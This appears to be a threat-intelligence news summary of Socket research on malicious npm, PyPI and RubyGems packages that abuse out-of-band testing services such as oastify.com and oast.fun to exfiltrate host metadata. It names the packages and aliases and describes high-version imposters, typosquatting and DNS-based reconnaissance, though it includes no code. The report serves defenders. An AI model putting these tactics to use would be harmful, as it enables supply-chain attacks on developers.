Threat Actor: Alias “nullljs”, “drv0s”, “Tu Nombre” | malicious actors
Victim: Developers and organizations | developers and organizations
Key Point :
- OAST techniques are being weaponized by threat actors to exfiltrate sensitive data and perform covert reconnaissance.
- Malicious packages on npm, PyPI, and RubyGems are designed to trick developers and exploit trusted ecosystems.
- Examples include high-version imposter packages, typosquatting, and DNS-based reconnaissance methods.
- Threat actors are likely to continue exploiting OAST techniques for malicious purposes.
Researchers at Socket have uncovered a series of malicious campaigns exploiting Out-of-Band Application Security Testing (OAST) techniques. Traditionally used by ethical hackers to identify vulnerabilities, OAST is now being misused by threat actors to exfiltrate sensitive data, establish command-and-control (C2) channels, and perform covert reconnaissance.
Originally developed for ethical security assessments, OAST tools like PortSwigger’s Burp Collaborator and Project Discovery’s interact.sh provide advanced capabilities, such as DNS lookups and HTTP requests. Unfortunately, these tools are being hijacked for nefarious purposes.
“Socket’s threat research team has continually observed and identified malicious JavaScript, Python, and Ruby packages leveraging OAST services such as oastify.com and oast.fun to exfiltrate sensitive data to attacker-controlled servers,” the report states.
Real-World Examples of Weaponized OAST
- npm: High-Version Imposter Packages
- Threat Actor: Alias “nullljs”
- Malicious Package: adobe-dcapi-web
- Tactic: Artificially high version numbers like 99.99.99 trick automated systems into downloading the malicious package. It uses obfuscated JavaScript to bypass Russian systems and exfiltrates data via oastify.com.
“The code adjusts its behavior based on the operating system and uses PowerShell on Windows or Bash scripts on Linux and macOS,” researchers noted.
- PyPI: Typosquatting for Silent Exfiltration
- Threat Actor: Alias “drv0s”
- Malicious Package: monoliht
- Tactic: A single-letter typo in the package name (monoliht) misleads developers. Hardcoded URLs send metadata like hostname and working directory to domains such as oast.fun.
- RubyGems: DNS-Based Reconnaissance
- Threat Actor: Alias “Tu Nombre”
- Malicious Packages: chauuuyhhn, nosvemosssadfsd
- Tactic: Embedded scripts exfiltrate IP addresses, hostnames, and more via DNS queries, avoiding detection by intrusion detection systems.
“By reversing a single letter, the threat actor created a package…used to silently collect metadata,” the report explains.
“Since DNS traffic often appears benign to basic intrusion detection systems, this method allows the threat actor to perform initial reconnaissance with lower risk of detection,” researchers warned.
The misuse of OAST techniques poses significant risks to developers and organizations worldwide. Malicious packages leverage trusted ecosystems like npm, PyPI, and RubyGems, making them particularly dangerous.
“Threat actors will continue to exploit the same out-of-band testing techniques for malicious purposes,” researchers caution.
Related Posts: